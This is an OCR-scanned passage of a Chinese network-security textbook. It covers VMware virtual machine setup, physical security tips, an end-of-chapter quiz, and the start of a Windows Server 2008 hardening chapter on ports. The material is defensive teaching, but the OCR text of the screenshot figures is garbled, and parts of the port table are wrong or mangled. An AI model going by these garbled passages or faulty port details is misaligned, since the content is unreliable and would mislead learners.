络 内 其 他 机 器 。 

图 Host-only( 只 与 主机 相连 ) 方 式 : 顾名思义 这 种 方式 只 能 进行 虚拟 系统 和 宿主 机 系 
统 之 间 的 网 络 通信 , 即 网 络 内 其 他 机 器 不 能 访问 虚拟 系统 ,虚拟 系统 也 不 能 访问 其 他 机 器 。 

图 自 定义 (custom) 方 式 : 使 用 这 种 连接 方式 ,虚拟 系统 存在 于 一 个 虚拟 的 网 络 当中 ， 
不 能 与 外 界 通信 ,只 能 与 在 同一 虚拟 网 络 中 的 虚拟 系统 通信 。 

@@ 虚拟 网 络 (LAN segment): 用 户 自己 新 建 的 局 域 网 网 段 , 只 有 在 同一 新 建 的 局 域 网 
网 段 中 的 虚拟 机 之 间 可 以 相互 访问 ,虚拟 机 与 宿主 机 之 间 不 能 相互 访问 。 

3) VMware 虚拟 机 功能 设置 

(1) 安装 VMware Tools。VMware Tools 是 VMware 虚拟 机 中 自 带 的 一 种 增强 工具 ， 
是 VMware 提供 的 增强 虚拟 显卡 和 硬盘 性 能 以 及 同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 只 
有 在 VMware 虚拟 机 中 安装 好 了 VMware Tools .才能 实现 主机 与 虚拟 机 之 间 的 文件 共享 ， 
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同时 可 支持 自由 拖 忠 的 功能 ,鼠标 指针 也 可 在 虚拟 机 与 主机 之 间 自 由 移动 (不 用 再 按 Ctrl 十 
Alt 组 合 键 ), 且 虚拟 机 屏幕 也 可 实现 全 屏 化 。 

安装 VMware Tools 的 方法 : 选择 "虚拟 机 ”安装 VMware Tools” 命 令 ,此 时 系统 将 
通过 安装 光盘 装载 VMware Tools, 完 成 安装 并 重新 启动 虚拟 机 。 

(2) 网 络 设置 。 由 于 本 项 目 联 网 采用 的 是 桥接 (bridged) 方 式 , 此 时 虚拟 主机 和 宿主 机 
的 真实 网 卡 可 以 设置 在 同一 个 网 段 ,两 者 之 间 的 关系 就 像 是 相 邻 的 两 台 计 算 机 一 样 。 

步骤 1: 设置 宿主 机 的 IP 地 址 为 192. 168. 1. 100 , 子 网 掩 码 为 255. 255. 255.0。 设 置 虚 
拟 主 机 的 IP 地 址 为 192. 168. 1. 200 , 子 网 掩 码 为 255. 255. 255. 0。 

步骤 2: 在 宿主 机 中 ,运行 ping 192. 168. 1. 200 命令 ,测试 与 虚拟 主机 的 连通 性 ,如 
图 1-21 所 示 。 














国 管理 员 : CAWindows\system32\cmd.exe ET 




















图 1-21 通过 ping 命令 测试 与 虚拟 主机 的 连通 性 


(3) 系统 快照 设置 。 快 照 (snapshob 指 的 是 虚拟 磁盘 CVMDK) 在 某 一 特定 时 间 点 的 副 
本 。 通 过 快照 可 以 在 系统 发 生 问题 后 恢复 到 快照 的 时 间 点 ,从 而 有 效 保护 磁盘 上 的 文件 系 
统 和 虚拟 机 的 内 存 数据 

在 VMware 中 进行 实验 ,可 以 随时 把 系统 恢复 到 某 一 次 快照 的 过 去 状态 中 ,这 个 过 程 
对 于 在 虚拟 机 中 完成 一 些 对 系统 有 潜在 危害 的 、 pe a | 
实验 非常 有 用 。 建立 一 个 快照 ,使 你 能 保留 一 个 虚拟 机 杖 态 ,以 便 以 后 恢 

步骤 1: 创建 快照 。 在 虚拟 机 中 ,选择 * 虚 | 开 e- 壤 
拟 机 ”一 “快照 "一 “创建 快照 ”命令 ,打开 “创建 ”|| 给 : 看 

















快照 "对 话 框 ,如 图 1-22 所 示 。 在 “名 称 "文本 框 | 

中 输入 快照 名 (如 “快照 1”) , 单 击 “创建 快照 ? 按 

ise Workstation 会 对 当前 系统 状态 进 二 
步骤 2: 用 从 各 带 打 条 光 渤 作 。 a 闻 中 二 过 快 二 2 


拟 机 ”一 “快照 ”>“1 快照 1” 命令, 如 图 1-23 
示 , 出 现 提示 信息 后 , 单 击 “ 是 按钮， VMware Wo 就 会 将 在 该 点 保存 的 系统 状态 
进行 还 原 。 
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[Ez 


中 电源 
) 可 移动 设备 (D) 
暂停 


加 完 Ctrit+Alt+Del 


2 EM) 





可 i 于 9 


安 壬 VMware Tools.… 


» 
» 
Cerl+Shift+p 


Cirl+G 








+ | 和 他 是 快照 
Cutrl+Alkt+PriSen 














Cul+D 





图 1-23 “快照 ”菜单 


(4) 修改 虚拟 机 的 基本 配置 。 创 建 好 的 虚拟 机 的 基本 配置 ,如 虚拟 机 的 内 存 大 小 、 硬 盘 
数量 、 网 卡 数量 和 网 络 连 接 方 式 、 声 卡 、USB 接口 等 设备 并 不 是 一 成 不 变 的 ,可 以 根据 需要 


进行 修改 。 


步骤 1: 在 “VMware Workstation” 主 界面 中 ,选中 想 要 修改 配置 的 虚拟 机 名 称 ( 如 
Windows Server 2008 R2 x64) ,再 选择 “虚拟 机 ”>“ 设 置 "命令 ,打开 “虚拟 机 设置 "对话 框 ,如 


图 1-24 所 示 。 

















加 硬盘 (5CSD 4068 
网 cD/pvp (IpE) 
屹 网 络 适 配器 


使 用 文件 D:\WWndows 2008.so 
NAT 

存在 

自动 检 囊 

存在 


内 存 


该 虚拟 机 内 存 (M): 























请 指定 要 为 该 虚拟 机 分 村内 存 大 小 。 访 内存 
大 小 值 必须 是 4 MB 的 信教 。 


2048 同 me 








图 1-24 “虚拟 机 设置 "对 话 框 (1) 














步骤 2: 在 “虚拟 机 设置 "对话 框 中 ,根据 需要 ,可 调整 虚拟 机 的 内 存 大 小 、 添 加 或 者 删除 
硬件 设备 、 修 改 网 络 连接 方式 、 修 改 虚 拟 机 中 CPU 的 数量 、 设 置 虚拟 机 的 名 称 、 修 改 虚拟 机 


的 操作 系统 及 版 本 等 选项 。 
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(5) 设置 共享 文件 夹 。 有 时 可 能 需要 虚拟 机 操作 系统 和 宿主 机 操作 系统 共享 一 些 文 
件 ,可 是 虚拟 硬盘 对 宿主 机 来 说 只 是 一 个 无 法 识别 的 文件 ,不 能 直接 交换 数据 ,此 时 可 使 用 
“共享 文件 夹 ”功能 来 解决 ,设置 方法 如 下 。 
步骤 1: 选择 “虚拟 机 ”>“ 设 置 "命令 ,打开 “虚拟 机 设置 "对话 框 ,选择 “选项 ”选项 卡 ,如 
图 1-25 所 示 。 




















文 折 夫 共 享 
入 共 京 这 忻 到 全 操作 的 立体 旺 吉 给 谨 所 机 中 的 
得 序 。 这 插 生 宁 人 9 及 与 趟 所 处于 外 险 中 。 
二 有 了 确信 二 激 乳 与 人 的 和 所 不 全 此 款 末 外 
险 ， 才 可 以 用 部 文件 夫 。 
站 大 用 
名 总 是 启用 (中 
el) 
加 PA 时 为 个 PNM) 
文 折 赤 [P 
soeree re 视图 
自动 登录 不 可 月 
让 

















CE 》 


大 性 (P) 











Cr 
图 1-25 “虚拟 机 设置 "对 话 框 (2) 
步骤 2: 选择 左 侧 窗 格 中 “共享 文件 来” 选项 ,在 “文件 夹 共 享 " 区 域 中 ,选中 “总 是 启用 ” 
单 选 按钮 和 “在 客户 机 映射 为 一 个 网 络 驱动 器 " 复 选 框 后 , 单 击 “ 添 加 ”按钮 ,打开 “添加 共享 
文件 夹 向 导 ” 对 话 框 ,如 图 1-26 所 示 。 

















添加 共享 文件 夹 向 导 区 本 





欢迎 使 用 添加 虚拟 机 文件 夹 向 导 


该 向 导 将 会 帮助 你 添加 一 个 新 的 共享 文件 来 到 你 的 虚 
拟 机 中 * 


Workstation 9 














< 上 一 步 (8) | = 步 (N)> 





EN| 














图 1-26 “添加 共享 文件 夹 向 导 ” 对 话 框 
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步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 共 享 文件 夹 名 称 ” 对 话 框 ,在 “主机 路 径 ” 文 本 框 中 , 指 
定 宿主 机 上 的 一 个 文件 夹 作 为 交换 数据 的 地 方 ,如 “D:\VMware Shared”; 在 “名 称 ” 文 本 框 
中 ,输入 共享 名 称 , 如 VMware Shared, 如 图 1-27 所 示 。 


文件 夫 名 称 
你 想 要 让 共享 文件 来 使 用 什么 名 称 ? 





主机 路 径 (H) 
D:\VMware Shared 

















名 称 (A) 
VMware Shared 




















图 1-27 “共享 文件 夹 名 称 ” 对 话 框 


步骤 4: 单 击 “下 一 步 ”按钮 ,出 现 “ 指 定 共 享 文件 夹 属性 ”对 话 框 ,如 图 1-28 所 示 。 选 中 


“启用 该 共享 " 复 选 框 后 , 单 击 “ 完 成 ”按钮 。 此 时 ,共享 文件 夹 在 虚拟 机 中 映射 为 一 个 网 络 驱 
动 器 (Z: 盘 ) 。 


ET 是 一 
指定 共享 文件 夫 必 性 
指定 该 共享 文件 夫 苑 转 :. 

















Er Om 











图 1-28 “指定 共享 文件 夹 属性 ”对 话 框 
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15 拓展 提升 : 基本 物理 安全 


物理 安全 很 容易 被 忽略 ,尤其 是 在 小 企业 或 家 庭 中 工作 时 。 一 旦 黑客 进入 用 户 的 机 器 ， 
那么 几 分 钟 内 就 会 受到 安全 威胁 。 请 掌握 以 下 这 些 原 则 : 让 用 户 的 机 器 远离 人 群 , 将 他 人 
阻止 在 外 和 保护 用 户 的 设备 。 

1) 让 用 户 的 机 器 远离 人 群 

很 多 大 公司 都 严格 控制 有 权 进 入 其 数据 中 心 的 人 员 ,他 们 使 用 钥匙 卡 或 键盘 系统 日志 
短 或 人 员 安 全 系统 (门禁 系统 ) 来 限制 未 经 授权 的 访问 。 由 于 一 般 没有 数据 中 心 ,一 些小 型 
企业 通常 喜欢 把 他 们 的 服务 器 放 在 走廊 、 接 待 场所 或 其 他 公开 的 地 方 。 这 不 仅 使 服务 器 容 
易 遭 受 恶意 攻击 ,而且 还 增加 了 发 生意 外 事故 的 风险 ,比如 咖啡 泼 到 机 器 上 ,有 人 被 电缆 纤 
倒 等 。 

如 果 可 能 ,应 该 将 敏感 的 服务 器 放 在 上 锁 的 门 后 。 其 实 , 不 仅 应 该 将 门 锁 住 ,而 且 还 应 
该 将 访问 权限 局 限 在 一 些 经 过 挑选 并 值得 信赖 的 管理 员 身 上 。 当 然 ,也 不 应 该 只 考虑 安全 
问题 ,而 不 顾 硬件 环境 的 要 求 。 例 如 ,将 一 台 服 务 器 锁 在 密室 里 自然 安全 ,但 如 果 房 间 的 通 
风能 力 不 足 ,计算 机 会 因 过 热 而 出 现 故障 ,从 而 使 得 用 户 对 安全 问题 的 考虑 变 得 毫 无 意义 。 

毫 无 疑问 ,计算 机 不 是 用 户 拥有 的 唯一 有 价值 的 资产 : 还 应 该 考虑 备份 磁盘 的 价值 。 
如 果 想 让 用 户 的 备份 一 直 都 可 用 ,最 好 将 其 存放 在 一 个 安全 的 地 方 ,防火 、 防 资 和 甚至 防止 
茶水 酒 在 上 面 。 

2) 将 他 人 阻止 在 外 

这 是 限制 物理 接触 和 限制 潜在 破坏 的 一 个 好 主意 .但 是 用 户 还 不 能 让 每 个 人 都 远离 自 
己 的 机 器 。 优 秀 的 物理 安全 计划 的 下 一 阶段 就 是 要 限制 计算 机 的 具体 操作 。 

当 离 开 时 把 计算 机 锁 起 来 。 在 Windows 7 中 ,只 需要 按 快捷 键 Ctrl 十 Alt 十 Delete, 然 
后 按 K 键 (Lock 按钮 的 快捷 键 )。 虽 然 身手 敏捷 的 攻击 者 能 在 10 秒 钟 之 内 不 用 密码 就 可 
以 进入 用 户 的 计算 机 并 共享 计算 机 的 磁盘 ,但 是 ,如 果 机 器 被 锁定 ,就 不 会 发 生 这 样 的 情况 。 
应 该 养 成 离开 时 锁定 计算 机 的 习惯 。 

有 了 限制 对 存放 计算 机 的 地 方 的 物理 接触 的 想法 ,其 必然 结果 就 是 限制 人 们 接触 计算 
机 的 部 件 。 可 以 通过 内 建 于 计算 机 的 物理 安全 特性 来 实现 这 一 目标 。 几 乎 每 一 台 计 算 机 都 
具备 一 些 有 用 的 安全 特性 。 可 以 利用 这 些 特性 ,让 用 户 的 计算 机 更 难于 受 攻击 或 被 盗 (或 者 
发 生 了 最 坏 的 情况 ,比如 计算 机 被 盗 , 那 么 也 只 是 损失 一 台 对 他 人 毫 无 价值 的 机 器 而 已 ) 。 
Windows 也 提供 了 许多 有 用 的 特性 。 

(1) 锁 住 安放 CPU 的 机 箱 。 许 多 台式 机 机 箱 和 塔 式 机 柜 都 有 锁 片 .可 以 用 来 阻止 窃贼 
打开 机 箱 。 

(2) 使 用 电缆 式 安全 锁 来 防止 别人 窃取 整 台 计算 机 。 对 于 可 以 轻易 地 藏 在 背包 或 外 套 
里 的 便携 式 计算 机 或 小 型 台式 机 来 说 ,这 是 一 个 非常 好 的 主意 。 

(3) 配置 BIOS 使 计算 机 不 能 通过 U 盘 等 启动 。 这 使 得 入侵 者 更 难于 从 用 户 的 系统 盘 
中 删除 密码 或 账户 数据 。 

(4) 考虑 是 否 值得 花 一 些 钱 , 在 存放 计算 机 的 房间 里 安装 活动 探测 报警 器 。 但 对 于 家 
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庭 办 公 室 , 建 立 覆 盖 整 个 办 公 区 域 的 安全 系统 通常 是 一 笔 没有 必要 的 业务 开支 。 

(5) 使 用 syskey 实用 程序 (Windows 7 支持 ) 来 保护 本 地 账户 数据 库 、EFS(Encrypting 
File System, 加 密 文 件 系 统 ) 加 密 密 钥 的 本 地 副本 以 及 其 他 不 想 让 攻击 者 获取 的 重要 数据 。 

(6) 使 用 EFS 对 计算 机 上 的 敏感 文件 夹 进行 加 密 。 不 管 使 用 的 是 便携 机 、 台 式 机 或 服 
务 器 ,通过 EFS 都 可 以 添加 一 层 额 外 的 保护 。 

3) 保护 用 户 的 设备 

网 络 电 线 连接 、 集 线 器 甚至 外 部 网 络 接口 都 是 网 络 中 非常 易于 受到 攻击 的 地 方 。 能 够 
连接 到 用 户 的 网 络 中 的 攻击 者 可 以 窃取 正在 传送 的 数据 ,或 者 对 用 户 的 网 络 或 其 他 网 络 中 
的 计算 机 发 动 攻 击 。 如 果 可 能 ,将 集线器 和 交换 机 放 在 有 人 看 管 的 房间 里 ,或 者 放 在 上 锁 的 
机 柜 中 , 沿 着 墙 和 天 花 板 分 布 电缆 ,使 其 不 容易 接触 到 ,此 外 还 要 确保 用 户 的 外 部 数据 连接 
点 处 于 锁定 状态 。 

其 他 方面 技巧 还 有 : 

(1) 如 果 家 用 计算 机 或 办 公 计 算 机 使 用 ADSL 连接 ,应 确保 电话 公司 的 接口 盒 已 经 上 
锁 , 如 果 电 缆 连接 出 现状 况 , 则 ADSL 服务 也 将 中 断 。 

(2) 如 果 想 使 用 无 线 网 络 连 接 , 应 确保 自己 了 解 安全 要 求 。 简 单 地 说 ,需要 保护 网 络 的 
安全 ,这 样 外 部 攻击 者 就 无 法 截获 用 户 的 流量 或 进入 用 户 的 网 络 。 这 在 Windows 7 中 都 很 
容易 办 到 。 

加 强 物理 安全 很 容易 做 到 ,而 且 不 需要 很 大 的 开销 ,尤其 与 之 所 带 来 的 安全 利益 相 比 ， 
这 点 花费 是 非常 值得 的 。 


习 是 
一 、 选 择 题 
1. 计算 机 网 络 安全 是 指 ( ) 。 
A. 信息 存储 安全 B. 网 络 使 用 者 的 安全 
C. 网 络 中 信息 的 安全 D. 网 络 的 财产 安全 


2. 网 络 信息 安全 就 是 要 防止 非法 攻击 和 病毒 的 传播 ,保障 电子 信息 的 有 效 性 ,从 具体 
的 意义 上 来 理解 ,需要 保证 以 下 (  ” )。 
A. 保密 性 、 完 整 性 .可 用 人 性 
B. 保密 性 、 完 整 性 、 可 控 性 
C. 完整 性 ,可 用 性 、 可 控 性 
D. 保密 性 ,完整 性 、 可 用 性 、 可 控 性 、 不 可 否认 性 
3. 以 下 ( ”) 不 是 保证 网 络 安全 的 要 素 。 


A. 信息 的 保密 性 B. 发 送信 息 的 不 可 否认 性 
C. 数据 交换 的 完整 性 D. 数据 存储 的 唯一 性 
4. 信息 风险 主要 是 指 ( 5 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 正确 
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SX ) 不 是 信息 失真 的 原因 。 
A. 信 源 提供 的 信息 不 安全 \ 不 准确 
B. 信息 在 编码 、 译 码 和 传递 过 程 中 受到 干扰 
C. 信 宿 接收 信息 时 出 现 偏差 
D. 信息 在 理解 上 的 偏差 
6. 以 下 ( ) 是 用 来 保证 硬件 和 软件 本 身 的 安全 的 。 


























A. 实体 安全 B. 运行 安全 C. 信息 安全 D. 系统 安全 
7. 黑客 搭 线 窃听 属于 (  ) 风 险 。 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 不 正确 
8. 信息 不 泄露 给 非 授权 的 用 户 、 实 体 或 过 程 , 指 的 是 信息 ( ) 特 性 。 
A. 保密 性 B. 完整 性 C. 可 用 性 D. 可 控 性 
Li ) 策 略 是 防止 非法 访问 的 第 一 道 防线 。 
A. 入 网 访问 控制 B. 网 络 权限 控制 
C. 目录 级 安全 控制 D. 属性 安全 控制 
10. 对 企业 网 络 最 大 的 威胁 是 ( 和 
A. 黑客 攻击 B. 外 国政 府 
C. 竞争 对 手 D. 内 部 员工 的 恶意 攻击 
11. UNIX 和 Windows Server 2008 操作 系统 符合 ( ) 级 别 的 安全 标准 。 
A. A 级 B.D 级 C。 Cl 级 D. C2 级 
12. 在 网 络 安全 中 ,在 未 经 许可 的 情况 下 ,对 信息 进行 删除 或 修改 ,这 是 对 ( ) 的 
攻击 
A. 保密 性 B. 完整 性 C. 可 用 性 D. 可 控 性 
二 , 填空 题 
1. 计算 机 网 络 安全 从 其 本 质 上 来 讲 就 是 系统 上 的 安全 。 
2. 从 广义 来 说 ,凡是 涉及 计算 机 网 络 上 信息 的 
和 的 相关 技术 和 理论 都 是 计算 机 网 络 安全 的 研究 领域 。 
3. 一 般 的 ,把 网 络 安全 涉及 的 内 容 分 为 安全 、 安全 、 安全 
安全 和 安全 5 个 方面 。 
4. PDRR 倡导 一 种 综合 的 安全 解决 方法 ,由 、 、 和 
这 4 个 部 分 构成 一 个 动态 的 信息 安全 周期 。 
5. 主动 防御 保护 技术 一 般 采 用 、 、 、 和 等 
技术 来 实现 。 
6. 被 动 防御 保护 技术 主要 有 、 、 和 
等 。 
7. 可 信 计 算 机 系统 评价 准则 (trusted computer system evaluation criteria,TCSEC) ,又 
称 为 橘 皮 书 , 它 将 计算 机 系统 的 安全 等 级 划分 为 、 、 和 
共 4 类 个 级 别 ,Linux 操作 系统 符合 级 别 的 安全 标准 。 
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项 目 1 认识 计算 机 网 络 安全 技术 

8. 我 国 的 《计算 机 信息 系统 安全 保护 等 级 划分 准则 ) 将 信息 系统 安全 划分 为 5 个 等 级 ， 
分 别 是 级 、 级 、 级 、 级 和 级 。 

三 、 简 答题 

1. 简 述 影响 网 络 安全 的 主要 因素 。 

2. 网 络 安全 涉及 哪些 内 容 ? 

3. 列举 出 网 络 安全 保障 的 主要 技术 。 

4. 列举 出 在 你 身边 网 络 安全 威胁 的 例子 。 

四 、 操 作 练习 题 

在 VMware Workstation 软件 上 安装 Windows 2000 Server 虚拟 机 。 
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项 目 2 Windows Server 2008 
系统 安全 加 固 


【项 目 目标 】 


(1) 了 解 操作 系统 安全 的 概念 。 

(2) 掌握 服务 与 端口 的 作用 。 

(3) 了 解 组 策略 的 作用 。 

(4) 了 解 漏洞 与 后 门 。 

(5) 掌握 账户 安全 、 密 码 安全 、 系 统 安全 、 服 务 安全 的 设置 方法 。 
(6) 了 解 如 何 禁用 注册 表 编 辑 器 。 

(7) 了 解 Windows 系统 的 安全 模板 。 


21 项 目 提 出 


张 先生 的 计算 机 新 装 了 Windows Server 2008 操作 系统 ,该 系统 具有 高 性 能 、 高 可 靠 性 
和 高 安全 性 等 特点 。Windows Server 2008 在 默认 安装 的 时 候 , 基 于 安全 的 考虑 已 经 实施 
了 很 多 安全 策略 ,但 由 于 服务 器 操作 系统 的 特殊 性 ,在 默认 安装 完成 后 还 需要 张 先生 对 其 进 
行 安全 加 固 ,进一步 提升 服务 器 操作 系统 的 安全 性 ,保证 应 用 系统 以 及 数据 库 系 统 的 安全 。 


22 项 目 分 析 


在 安装 Windows Server 2008 操作 系统 时 ,为 了 提高 系统 的 安全 性 , 张 先生 按 系统 建 
议 ,采用 最 小 化 方式 安装 ,只 安装 网 络 服务 所 必需 的 组 件 。 如 果 以 后 有 新 的 服务 需求 ,再 安 
装 相应 的 服务 组 件 , 并 及 时 进行 安全 设置 。 

在 完成 操作 系统 安装 全 过 程 后 . 张 先生 要 对 Windows 系统 安全 性 方面 进行 加 固 ,系统 
加 固 工作 主要 包括 账户 安全 配置 、 密 码 安全 配置 .系统 安全 配置 .服务 安全 配置 以 及 禁用 注 
册 表 编辑 器 等 内 容 , 从 而 使 得 操作 系统 变 得 更 加 安全 可 靠 ,为 以 后 的 工作 提供 一 个 良好 的 操 
作 平 台 。 

操作 系统 的 安全 是 整个 计算 机 系统 安全 的 基础 ,其 安全 问题 日 益 引起 人 们 的 高 度 重 视 。 
作为 用 户 使 用 计算 机 和 网 络 资源 的 操作 界面 ,操作 系统 发 挥 着 十 分 重要 的 作用 。 因 此 ,操作 
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系统 本 身 的 安全 就 成 了 安全 防护 的 头等 大 事 。 
23 相关 知识 点 


2.3.1 操作 系统 安全 的 概念 


操作 系统 的 安全 防护 研究 通常 包括 以 下 几 个 方面 的 内 容 。 

(1) 操作 系统 本 身 提供 的 安全 功能 和 安全 服务 。 目 前 的 操作 系统 本 身 往往 要 提供 一 定 
的 访问 控制 .认证 与 授权 等 方面 的 安全 服务 ,如何 对 操作 系统 本 身 的 安全 性 能 进行 研究 和 开 
发 使 之 符合 选 定 的 环境 和 需求 。 

(2) 针对 各 种 常用 的 操作 系统 ,进行 相关 配置 ,使 之 能 正确 对 付 和 防御 各 种 入 侵 。 

(3) 保证 操作 系统 本 身 所 提供 的 网 络 服务 能 得 到 安全 配置 。 

一 般 来 说 ,如 果 说 一 个 计算 机 系统 是 安全 的 ,那么 是 指 该 系统 能 够 控制 外 部 对 系统 信息 
的 访问 。 也 就 是 说 ,只 有 经 过 授权 的 用 户 或 代表 该 用 户 运 行 的 进程 才能 读 、 写 、 创 建 或 删除 
信息 。 

操作 系统 内 的 活动 都 可 以 认为 是 主体 对 计算 机 系统 内 部 所 有 客体 的 一 系列 操作 。 主 体 
是 指 发 出 访问 操作 、 存 取 请 求 的 主动 方 , 它 包括 用 户 、 用 户 组 、 主 机、 终端 或 应 用 进程 等 。 主 
体 可 以 访问 客体 。 客 体 是 指 被 调用 的 程序 或 要 存 取 的 数据 访问 , 它 包 括 文件 ,程序 .内存 、 目 
录 、 队 列 、 进 程 间 报 文 .1/O 设备 和 物理 介质 等 。 主 体 对 客体 的 安全 访问 策略 是 一 套 规则 ,可 
用 于 确定 一 个 主体 是 否 对 客体 拥有 访问 能 力 。 

一 般 所 说 的 操作 系统 的 安全 通常 包含 两 方面 的 含义 : 四 操作 系统 在 设计 时 通过 权限 访 
问 控制 ,信息 加 密 性 保护 ` 完 整 性 鉴定 等 机 制 实现 的 安全 ; 四 操作 系统 在 使 用 中 ,通过 一 系 
列 的 配置 ,保证 操作 系统 避免 由 于 实现 时 的 缺陷 或 是 应 用 环境 因素 产生 的 不 安全 因素 。 只 
有 在 这 两 方面 同时 努力 ,才能 够 最 大 可 能 地 建立 安全 的 操作 系统 。 


2.3.2 服务 与 端口 


我 们 知道 ,一 台 拥 有 IP 地 址 的 主机 可 以 提供 许多 服务 ,比如 Web 服务 、FTP 服务 、 
SMTP 服务 等 ,这 些 服务 完全 可 以 通过 1 个 IP 地 址 来 实现 。 那 么 ,主机 是 怎样 区 分 不 同 的 
网 络 服务 呢 ? 显然 不 能 只 靠 IP 地 址 ,因为 IP 地 址 与 网 络 服务 的 关系 是 一 对 多 的 关系 。 实 
际 上 是 通过 “IP 地 址 十 端口 号 ?来 区 分 不 同 的 服务 的 。 

我 们 来 打 个 形象 的 比喻 : 假设 IP 地 址 是 一 栋 大 楼 的 地 址 ,那么 端口 号 就 代表 着 这 栋 大 
楼 的 不 同房 间 。 如 果 一 封 信 ( 数 据 包 ) 上 的 地 址 仅 包 含 了 这 栋 大 楼 的 地 址 (IP) 而 没有 具体 的 
房间 号 (端口 号 ) ,那么 没有 人 知道 谁 (网 络 服务 ) 应 该 去 接收 它 。 为 了 让 邮递 成 功 ,发 信人 不 
仅 需 要 写 明 大 楼 的 地 址 (IP 地 址 ) ,还 需要 标注 具体 的 收 信人 房间 号 (端口 号 ) ,这 样 这 封 信 
才能 被 顺利 地 投递 到 它 应 该 前 往 的 房间 。 

端口 是 计算 机 与 外 界 通信 的 渠道 ,它们 就 像 一 道道 门 一 样 控制 着 数据 与 指令 的 传输 。 
各 类 数据 包 在 最 终 封包 时 都 会 加 入 端口 信息 ,以 便 在 数据 包 接 收 后 拆 包 识别 。 通 常 , 许 多 蠕 
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虫 病毒 正 是 利用 了 端口 信息 才能 实现 恶意 骚扰 的 。 所 以 ,对 于 原本 脆弱 的 Windows 系统 来 
说 ,有 必要 把 一 些 危险 而 又 不 常用 到 的 端口 关闭 或 是 封锁 ,以 保证 网 络 安全 。 

同样 地 , 面 对 网 络 攻 击 时 ,端口 对 于 黑客 来 说 至 关 重 要 。 每 一 项 服务 都 对 应 相应 的 端口 
号 ,比如 和 人们 浏览 网 页 时 ,需要 服务 器 提供 WWW 服务 ,端口 号 是 80,SMTP 服务 的 端口 号 
是 25,FTP 服务 的 端口 号 是 21, 如 果 企 业 中 的 服务 器 仅仅 是 文件 服务 或 者 做 内 网 交换 ,应 
关闭 不 必要 的 端口 ,因为 在 关闭 这 些 端口 后 ,可 以 进一步 保障 系统 的 安全 。 

我 们 知道 ,在 TCP 和 UDP 中 , 源 端 口 和 目标 端口 是 用 一 个 16 位 无 符号 二 进 制 整数 来 
表示 的 ,这 就 意味 着 端口 号 共有 65 536 个 (一 25 ,0 一 65 535)。 

按 对 应 的 协议 类 型 ,端口 有 两 种 : TCP 端口 和 UDP 端口 。 由 于 TCP 和 UDP 两 个 协 
议 是 独立 的 ,因此 各 自 的 端口 号 也 相互 独立 ,比如 TCP 有 235 端口 ,UDP 也 可 以 有 235 端 
口 ,两 者 并 不 冲突 。 

IETF 定义 了 以 下 三 种 端口 组 。 

(1) 公认 端口 (well-known ports): 从 0 一 1023 ,它们 紧密 绑 定 (binding) 于 一 些 服 务 。 
通常 这 些 端 口 的 通信 明确 表明 了 某 种 服务 的 协议 。 例 如 : 80 端口 实际 上 总 是 HTTP 通信 。 

(2) 注册 端口 (registered ports): 从 1024 一 49 151。 它 们 松散 地 绑 定 于 一 些 服 务 。 也 
就 是 说 ,有 许多 服务 绑 定 于 这 些 端 口 ,这 些 端口 同样 用 于 许多 其 他 目的 。 例 如 : 许多 系统 处 
理 动 态 端口 从 1024 左右 开始 。 

(3) 动态 和 (或 ) 私 有 端口 (dynamic and/or private ports): 从 49 152 一 65 535。 理 论 
上 ,不 应 为 服务 分 配 这些 端 口 。 实 际 上 ,机 器 通常 从 1024 起 分 配 动态 端口 。 但 也 有 例外 ， 
SUN 的 RPC 端口 从 32768 开始 。 

常用 的 TCP/UDP 端口 号 见 表 2-1。 


表 2-1 常用 的 TCP/UDP 端口 号 






































TCP 端口 号 UDP 端口 号 
端口 号 服务 端口 号 服务 
0 保留 0 保留 
20 FTP-data 49 Login 
21 FTP-command 53 DNS 
23 Telnet 69 TFIP 
25 SMTP 80 WWW 
53 DNS 88 Kerberos 
79 Finger 110 POP3 
80 WWW 161 SNMP 
88 Kerberos 213 IPX 
139 NetBIOS 2049 NFS 
443 HTTPS 443 HTTPS 
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管理 好 端口 号 在 网 络 安全 中 有 着 非常 重要 的 意义 ,黑客 往往 通过 探测 目标 主机 开启 的 
端口 号 进行 攻击 。 所 以 ,对 那些 没有 用 到 的 端口 号 ,最 好 将 它们 关闭 。 

一 个 通信 连接 中 , 源 端口 与 目标 端口 并 不 是 相同 的 ,如 客户 机 访问 WWW 服务 器 时 ， 
WWW 服务 器 使 用 的 是 80 端口 (目标 端口 ) ,而 客户 端的 端口 则 是 系统 动态 分 配 的 大 于 
1023 的 随机 端口 ( 源 端 口 ) 。 

开启 的 端口 可 能 被 攻击 者 利用 ,如 利用 扫描 软件 ,可 以 扫描 到 目标 主机 中 开启 的 端口 及 
服务 ,因为 提供 服务 就 有 可 能 存在 漏洞 。 入 侵 者 通常 会 用 扫描 软件 对 目标 主机 的 端口 进行 
扫描 ,以 确定 哪些 端口 是 开放 的 。 从 开放 的 端口 ,入 侵 者 可 以 知道 目标 主机 大 致 提供 了 哪些 
服务 ,进而 寻找 可 能 存在 的 漏洞 。 因 此 对 端口 的 扫描 有 助 于 了 解 目标 主机 ,从 管理 角度 来 
看 ,扫描 本 机 的 端口 也 是 做 好 安全 防范 的 前 提 。 

查看 端口 的 相关 工具 有 : Windows 系统 中 的 netstat 命令 .fport 软件 、activeport 软件 、 
superscan 软件 、Visual Sniffer 软件 等 ,此 类 命令 或 软件 可 用 来 查看 主机 所 开放 的 端口 。 

可 以 在 网 上 查看 各 种 服务 对 应 的 端口 号 和 木马 后 门 常用 端口 来 判断 系统 中 的 可 疑 端 
口 ,并 通过 软件 查看 开启 此 端口 的 进程 。 

确定 可 疑 端口 和 进程 后 ,可 以 利用 防火 墙 来 屏 项 此 端口 。 对 于 网 络 中 的 普通 客户 计算 
机 ,可 以 限制 对 外 的 所 有 的 端口 ,不必 对 外 提供 任何 服务 ;而 对 于 服务 器 , 则 把 需要 提供 服务 
的 端口 ,如 WWW 服务 端口 80 等 开放 ,不 使 用 的 其 他 端口 则 全 部 关闭 。 可 以 利用 端口 查看 
工具 检查 开启 的 非 业务 端口 。 

关闭 端口 的 方法 非常 简单 ,选择 “控制 面板 ”管理 工具 ”服务 ?选项 即 可 配置 。 

一 些 端口 常常 会 被 攻击 者 或 病毒 木马 所 利用 ,如 端口 21、22、23、25、80、110、111、119、 
135、137、138、139、161、177、389、3389 等 。 关 于 常见 木马 程序 所 使 用 的 端口 可 以 在 网 上 查 
找到 。 

